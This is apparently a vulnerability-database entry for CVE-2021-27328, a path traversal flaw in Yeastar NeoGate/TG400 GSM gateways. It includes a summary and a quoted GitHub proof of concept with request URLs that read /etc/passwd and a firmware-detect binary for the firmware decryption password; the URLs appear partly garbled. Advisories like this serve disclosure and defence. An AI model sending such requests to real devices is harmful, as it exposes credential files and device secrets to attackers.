Published: 19/02/2021 Updated: 19/02/2021

Vulnerability Summary

Yeastar NeoGate could allow a remote authenticated malicious user to traverse directories on the system. An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) in the '1404' parameter to view arbitrary files on the system.

Most Upvoted Vulmon Research Post

Path Traversal on Yeastar TG400 GSM Gateway - To get firmware decrypting password: To get /etc/paswd:

Vulnerability Trend

Github Repositories

CVE-2021-27328 Path Traversal on Yeastar TG400 GSM Gateway - 91303 to get firmware decrypting password 19216843246/cgi/WebCGI?1404=//////////bin/firmware_detect to get /etc/paswd 19216843246/cgi/WebCGI?1404=//////////etc/passwd